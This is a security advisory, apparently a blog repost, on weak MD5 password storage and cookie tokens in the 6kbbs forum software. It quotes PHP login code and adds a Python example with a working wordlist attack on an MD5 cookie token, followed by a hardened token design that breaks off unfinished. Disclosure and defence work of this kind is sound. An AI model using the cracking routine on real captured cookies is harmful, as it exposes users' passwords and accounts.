<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Exploit Title: 6kbbs Weak Encryption Web Security Vulnerabilities</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Vendor: 6kbbs</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Product: 6kbbs</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Vulnerable Versions: v7.1 v8.0</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Tested Version: v7.1 v8.0</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Advisory Publication: June 08, 2015</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Latest Update: June 10, 2015</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Vulnerability Type: Inadequate Encryption Strength [CWE-326]</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">CVE Reference: *</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">CVSS Severity (version 2.0):</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Discoverer and Reporter: Wang Jing [School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore] (<a href="https://twitter.com/justqdjing/status/608928069663850497">@justqdjing</a>)</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Recommendation Details:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><b>(1) Vendor & Product Description:</b></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Vendor:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">6kbbs</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Product & Vulnerable Versions:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">6kbbs</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">v7.1</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">v8.0</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Vendor URL & download:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">6kbbs can be obtained from here:</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://www.6kbbs.com/download.html"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://www.6kbbs.com/download.html</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Product Introduction Overview:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">"6kbbs V8.0 is a high-performance forum built using PHP + MySQL; its code is simple, easy to use, powerful, fast, and so on. It is an excellent community forum program. The program is simple but not simple; fast and small; the interface is generous and scalability is good; it is functional and practical, pursuing superior performance, a good interface, and the practical functions users prefer. Forum technical realization: (a) Interface: uses an XHTML + CSS structure, so the page structure and the interface are easy to modify; static page code saves on transmission, greatly reducing the amount of data transmitted over the network; improves interface scalability and is more in line with web standards; supports Internet Explorer, FireFox, Opera and other major browsers. (b) Program: mature ASP + ACCESS technology; the installation process is extremely simple, and the environment is also very common."</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">"(1) PHP version: (a) 6kbbs V8.0 starts using a PHP + MySQL architecture. (b) Currently (July 2010) it is still in the testing phase; 6kbbs V8.0 is the latest official release. (2) ASP version: 6kbbs (6k Forum) is an excellent community forum program. The program is simple but not simple; fast and small; the interface is generous and scalability is good; functional and practical. It pursues superiority, a good interface, and the practical functions of choice for subscribers."</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">(2) Vulnerability Details:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">The 6kbbs web application has an inadequate encryption strength weakness. User passwords are protected with an MD5-based scheme: the authentication code shown below compares md5(md5($userpass).$salt) against the stored value and, after a successful match, rewrites the stored value and clears the salt field. The software therefore stores sensitive data using a scheme that is theoretically sound but not strong enough for the level of protection required. A weak scheme of this kind can be subjected to brute-force attacks that have a reasonable chance of succeeding with current attack methods and resources.</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Several 0-day web vulnerabilities in 6kbbs products have been found by other bug hunters and researchers before, and 6kbbs has patched some of them. "The Full Disclosure mailing list is a public forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. FD differs from other security lists in its open nature and support for researchers' right to decide how to disclose their own discovered bugs. The full disclosure movement has been credited with forcing vendors to better secure their products and to publicly acknowledge and fix flaws rather than hide them. Vendor legal intimidation and censorship attempts are not tolerated here!" A great many web security advisories have been published there.</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Source Code:</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><?php</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">// Fallback path: taken only when $row was not filled by an earlier lookup</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">if(empty($row)){</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">&nbsp;&nbsp;&nbsp;&nbsp;$extrow=$db->row_select_one("users","username='{$username}'");</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">&nbsp;&nbsp;&nbsp;&nbsp;if(!empty($extrow) && !empty($extrow['salt'])){</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;// Weak scheme: salted double MD5, compared with loose == rather than hash_equals()</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(md5(md5($userpass).$extrow['salt'])==$extrow['userpass']){</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$row=$extrow;</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;// Overwrite the stored value with $userpass_encrypt (computed elsewhere) and clear the salt column</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$new_row["userpass"]=$userpass_encrypt;</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$new_row["salt"]="";</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$db->row_update("users",$new_row,"id={$extrow['id']}");</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">&nbsp;&nbsp;&nbsp;&nbsp;}</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">}</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">?></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">Source Code From:</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://code.google.com/p/6kbbs/source/browse/trunk/convert/discuz72/loginext.php?r=16"><span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">http://code.google.com/p/6kbbs/source/browse/trunk/convert/discuz72/loginext.php?r=16</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">We can see that the "userpass" value stored in the cookie is derived directly from the user's password: "$userpass_encrypt" is an unsalted MD5 digest of "$userpass", and the salt column is explicitly cleared ("$new_row["salt"]=""), so nothing per-user is mixed into the digest. The cookie is also set without the "HttpOnly" attribute, so any script that runs in the page (for example through an XSS flaw) can read it. MD5 is a fast one-way hash, not encryption, and an unsalted MD5 of a password can be tested against wordlists at very high rates on commodity hardware, while precomputed tables already cover the common passwords. An attacker who obtains the cookie therefore usually recovers the password itself, not merely a session, and the same digest is valid for every 6kbbs site where the user reused that password.</span></div>
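<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;">The following is an added example, not code from 6kbbs or from the original advisory. It models the weak scheme in Python (a cookie token equal to the hex MD5 of the password with no salt, as the listing above suggests), shows how cheaply such a token is reversed with a wordlist once it has been read from the cookie, and contrasts it with a remember-me token that is random, authenticated with an HMAC under a server-side secret, checked against a server-side record, and sent with HttpOnly, Secure and SameSite. The wordlist, the user id, the server secret and the captured cookie are all constructed for the example.</span></div>

```python
"""Added example (not 6kbbs code): why a cookie holding md5(password) is weak,
and what a remember-me token should look like instead.

Assumption: the cookie token is exactly hex(md5(password)) with no salt, as the
loginext.php listing suggests ($new_row["salt"] = ""). The wordlist, user id,
secret and captured cookie below are constructed for this example.
"""
import hashlib
import hmac
import secrets
from typing import Iterable, Optional, Set, Tuple


def weak_cookie_token(password: str) -> str:
    """Model of the vulnerable scheme: unsalted MD5 of the password itself."""
    return hashlib.md5(password.encode()).hexdigest()


def crack_md5_token(token: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack against a stolen token.

    Anyone who can read the cookie (script injection when HttpOnly is missing,
    plaintext HTTP, a shared machine) hashes guesses until one matches. Each
    guess costs one MD5 and there is no salt, so one table serves every user.
    """
    for candidate in wordlist:
        if hmac.compare_digest(weak_cookie_token(candidate), token):
            return candidate
    return None


# --- Hardened alternative -------------------------------------------------
# The cookie must not be derived from the password at all. Issue a random
# nonce, keep only a hash of it server-side, and bind user id and nonce with an
# HMAC under a server secret so a forged or tampered cookie is rejected before
# any database lookup happens.
SERVER_SECRET = secrets.token_bytes(32)  # constructed; would come from config


def _tag(user_id: str, nonce: str, secret: bytes) -> str:
    return hmac.new(secret, f"{user_id}:{nonce}".encode(), hashlib.sha256).hexdigest()


def issue_session_token(user_id: int, secret: bytes = SERVER_SECRET) -> Tuple[str, str]:
    """Return (cookie_value, server_side_record).

    cookie_value = "<user_id>:<nonce>:<hmac>"; the server stores sha256(nonce)
    so a leaked database row cannot be replayed as a cookie.
    """
    nonce = secrets.token_hex(16)
    cookie = f"{user_id}:{nonce}:{_tag(str(user_id), nonce, secret)}"
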